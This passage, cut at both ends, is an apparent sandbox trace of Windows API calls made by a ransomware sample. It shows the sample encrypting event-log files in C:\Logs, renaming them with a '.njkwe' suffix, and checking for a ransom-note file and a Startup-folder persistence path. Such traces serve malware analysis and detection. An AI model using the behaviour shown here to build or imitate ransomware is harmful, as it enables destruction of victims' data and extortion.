liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.842] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.842] GetProcessHeap () returned 0xbe0000 [0066.843] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.843] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.843] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.843] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.843] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.843] CloseHandle (hObject=0x428) returned 1 [0066.845] GetProcessHeap () returned 0xbe0000 [0066.845] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.845] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 73 [0066.845] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.845] GetProcessHeap () returned 0xbe0000 [0066.845] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.845] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd0763ff, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd0763ff, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cAlternateFileName="MIE2F0~1.EVT")) returned 1 [0066.845] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="Windows") returned -1 [0066.845] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="$Recycle.bin") returned 1 [0066.846] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="System Volume Information") returned -1 [0066.846] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="Program Files") returned -1 [0066.846] lstrcmpiW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="Program Files (x86)") returned -1 [0066.846] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 61 [0066.846] StrStrIW (lpFirst="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpSrch=".njkwe") returned 0x0 [0066.846] lstrcmpW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.846] lstrcmpW (lpString1="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpString2="taridd") returned -1 [0066.846] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.846] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.846] GetTickCount () returned 0x11511b0 [0066.846] GetTickCount () returned 0x11511b0 [0066.846] GetTickCount () returned 0x11511b0 [0066.846] GetTickCount () returned 0x11511b0 [0066.846] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.846] GetProcessHeap () returned 0xbe0000 [0066.846] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.846] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.848] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.848] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.848] GetProcessHeap () returned 0xbe0000 [0066.848] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.848] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.848] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.848] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.849] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.849] CloseHandle (hObject=0x428) returned 1 [0066.862] GetProcessHeap () returned 0xbe0000 [0066.862] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.862] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx_r00t_{3sXlE5}.njkwe") returned 81 [0066.862] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.862] GetProcessHeap () returned 0xbe0000 [0066.863] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.863] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5089d037, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5089d037, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cAlternateFileName="MIAB1D~1.EVT")) returned 1 [0066.863] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="Windows") returned -1 [0066.863] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="$Recycle.bin") returned 1 [0066.863] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="System Volume Information") returned -1 [0066.863] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="Program Files") returned -1 [0066.863] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="Program Files (x86)") returned -1 [0066.863] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 78 [0066.863] StrStrIW (lpFirst="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpSrch=".njkwe") returned 0x0 [0066.863] lstrcmpW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.863] lstrcmpW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpString2="taridd") returned -1 [0066.863] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.863] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.863] GetTickCount () returned 0x11511bf [0066.863] GetTickCount () returned 0x11511bf [0066.863] GetTickCount () returned 0x11511bf [0066.863] GetTickCount () returned 0x11511bf [0066.863] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.863] GetProcessHeap () returned 0xbe0000 [0066.863] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.863] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.866] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.866] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.866] GetProcessHeap () returned 0xbe0000 [0066.866] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.866] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.867] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.867] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.867] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.867] CloseHandle (hObject=0x428) returned 1 [0066.869] GetProcessHeap () returned 0xbe0000 [0066.869] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.869] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx_r00t_{3sXlE5}.njkwe") returned 98 [0066.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.870] GetProcessHeap () returned 0xbe0000 [0066.870] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.870] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508c32a6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x508c32a6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cAlternateFileName="MI62D3~1.EVT")) returned 1 [0066.870] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="Windows") returned -1 [0066.870] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.870] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.870] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="Program Files") returned -1 [0066.870] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.870] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 84 [0066.870] StrStrIW (lpFirst="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.870] lstrcmpW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.870] lstrcmpW (lpString1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpString2="taridd") returned -1 [0066.870] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.870] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.870] GetTickCount () returned 0x11511cf [0066.870] GetTickCount () returned 0x11511cf [0066.870] GetTickCount () returned 0x11511cf [0066.870] GetTickCount () returned 0x11511cf [0066.870] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.870] GetProcessHeap () returned 0xbe0000 [0066.870] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.870] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.872] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.872] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.872] GetProcessHeap () returned 0xbe0000 [0066.872] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.872] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.872] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.873] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.873] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.873] CloseHandle (hObject=0x428) returned 1 [0066.875] GetProcessHeap () returned 0xbe0000 [0066.875] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.875] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 104 [0066.875] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.875] GetProcessHeap () returned 0xbe0000 [0066.875] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.875] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc14341c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc14341c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cAlternateFileName="MIEC03~1.EVT")) returned 1 [0066.875] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="Windows") returned -1 [0066.875] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="$Recycle.bin") returned 1 [0066.875] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="System Volume Information") returned -1 [0066.875] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="Program Files") returned -1 [0066.876] lstrcmpiW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="Program Files (x86)") returned -1 [0066.876] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 82 [0066.876] StrStrIW (lpFirst="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpSrch=".njkwe") returned 0x0 [0066.876] lstrcmpW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.876] lstrcmpW (lpString1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpString2="taridd") returned -1 [0066.876] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.876] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.876] GetTickCount () returned 0x11511cf [0066.876] GetTickCount () returned 0x11511cf [0066.876] GetTickCount () returned 0x11511cf [0066.876] GetTickCount () returned 0x11511cf [0066.876] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.877] GetProcessHeap () returned 0xbe0000 [0066.877] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.877] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.878] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.878] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.879] GetProcessHeap () returned 0xbe0000 [0066.879] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.879] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.879] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.879] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.879] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.879] CloseHandle (hObject=0x428) returned 1 [0066.881] GetProcessHeap () returned 0xbe0000 [0066.881] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.881] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx_r00t_{3sXlE5}.njkwe") returned 102 [0066.881] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.882] GetProcessHeap () returned 0xbe0000 [0066.882] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.882] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1b5b23, ftCreationTime.dwHighDateTime=0x1d1a04e, 